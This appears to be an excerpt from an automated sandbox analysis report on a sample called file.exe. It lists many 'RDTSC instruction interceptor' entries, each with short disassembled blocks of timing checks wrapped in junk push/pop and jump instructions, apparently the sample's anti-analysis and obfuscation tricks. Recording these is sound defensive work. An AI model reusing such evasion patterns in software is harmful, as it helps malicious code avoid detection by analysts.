              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93320D second address: 933216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933360 second address: 933366 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933366 second address: 93336C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93336C second address: 933383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Dh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933383 second address: 933387 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9337EE second address: 9337F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9337F4 second address: 9337FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9337FC second address: 933802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 933968 second address: 93398C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC211Eh 0x00000008 jmp 00007F052CBC2118h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93398C second address: 933990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BD9D second address: 93BDB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F052CBC2106h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93BDB1 second address: 93BDB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 939DFD second address: 939E12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F052CBC2106h 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jc 00007F052CBC2106h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93A0CA second address: 93A0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93A3A5 second address: 93A3C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F052CBC2118h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93A3C2 second address: 93A3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Ch 0x00000009 jmp 00007F052CEB1F1Eh 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F052CEB1F1Ch 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93A99F second address: 93A9B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC210Dh 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2CC second address: 93B2D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2D0 second address: 93B2DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B2DC second address: 93B2E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93B82B second address: 93B835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FBFC second address: 93FC06 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93FC06 second address: 93FC17 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jno 00007F052CBC2106h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94012A second address: 94012E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94012E second address: 940138 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9403EB second address: 9403F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F052CEB1F16h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9403F7 second address: 9403FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 944E1D second address: 944E21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D551 second address: 94D556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B8BA second address: 94B8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B8BE second address: 94B8C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BC7D second address: 94BC98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F052CEB1F1Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BC98 second address: 94BC9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BC9C second address: 94BCA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BCA0 second address: 94BCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BCA9 second address: 94BCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BCAE second address: 94BCB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C0FB second address: 94C0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C3C7 second address: 94C3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2112h 0x00000009 jne 00007F052CBC2106h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C3E3 second address: 94C40A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F26h 0x00000007 jmp 00007F052CEB1F1Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CD83 second address: 94CD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B30F second address: 94B31C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B31C second address: 94B321 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B321 second address: 94B327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B327 second address: 94B338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F052CBC2112h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B338 second address: 94B34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F052CEB1F16h 0x0000000a js 00007F052CEB1F18h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B34A second address: 94B354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F052CBC2106h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B354 second address: 94B365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jne 00007F052CEB1F16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95438E second address: 9543C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CBC2112h 0x00000007 jmp 00007F052CBC210Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F052CBC210Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9543C0 second address: 9543D7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F052CEB1F1Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 953F52 second address: 953F56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954093 second address: 95409D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95409D second address: 9540A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9540A3 second address: 9540A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956691 second address: 956695 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956695 second address: 9566A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F052CEB1F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9566A5 second address: 9566BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2113h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9566BC second address: 9566C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95651C second address: 956528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F052CBC2106h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956528 second address: 956537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007F052CEB1F1Ah 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956537 second address: 956555 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F052CBC2118h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 956555 second address: 956559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96349A second address: 9634D5 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC2106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F052CBC2113h 0x00000010 pushad 0x00000011 popad 0x00000012 pop edi 0x00000013 jmp 00007F052CBC2114h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9634D5 second address: 9634E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F052CEB1F16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96305D second address: 963074 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F052CBC2106h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jnc 00007F052CBC2106h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B242 second address: 96B246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B246 second address: 96B267 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F052CBC2115h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B267 second address: 96B273 instructions: 0x00000000 rdtsc 0x00000002 je 00007F052CEB1F1Eh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B273 second address: 96B27A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B27A second address: 96B294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CEB1F1Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B294 second address: 96B29A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89757D second address: 897594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F052CEB1F1Fh 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 897594 second address: 89759A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89759A second address: 8975AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 jng 00007F052CEB1F33h 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DEF2 second address: 97DF06 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F052CBC2106h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007F052CBC2106h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97C906 second address: 97C91F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D22B second address: 97D231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97D231 second address: 97D24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F28h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97DC15 second address: 97DC32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F052CBC2106h 0x0000000c popad 0x0000000d jc 00007F052CBC2108h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F052CBC2106h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBCA second address: 89FBCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBCE second address: 89FBEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F052CBC2116h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBEE second address: 89FBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 89FBF4 second address: 89FBF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982D6C second address: 982D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982A3D second address: 982A47 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F052CBC2106h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 982A47 second address: 982A79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F052CEB1F29h 0x0000000b push ecx 0x0000000c jmp 00007F052CEB1F1Dh 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EC02 second address: 98EC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F052CBC2106h 0x0000000a js 00007F052CBC2106h 0x00000010 jmp 00007F052CBC210Ch 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 98EC1F second address: 98EC37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnc 00007F052CEB1F2Fh 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B72F3 second address: 9B72F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62BC second address: 9B62DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jne 00007F052CEB1F16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F052CEB1F22h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62DE second address: 9B62E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B62E2 second address: 9B630C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F052CEB1F22h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jc 00007F052CEB1F16h 0x00000012 push esi 0x00000013 pop esi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B630C second address: 9B6312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6312 second address: 9B632A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F052CEB1F1Bh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B632A second address: 9B6332 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B661F second address: 9B6629 instructions: 0x00000000 rdtsc 0x00000002 js 00007F052CEB1F16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67A1 second address: 9B67CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007F052CBC2106h 0x0000000b jmp 00007F052CBC2119h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67CD second address: 9B67E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F052CEB1F25h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67E9 second address: 9B67ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B67ED second address: 9B67F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FBE second address: 9B6FC3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B6FC3 second address: 9B6FC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
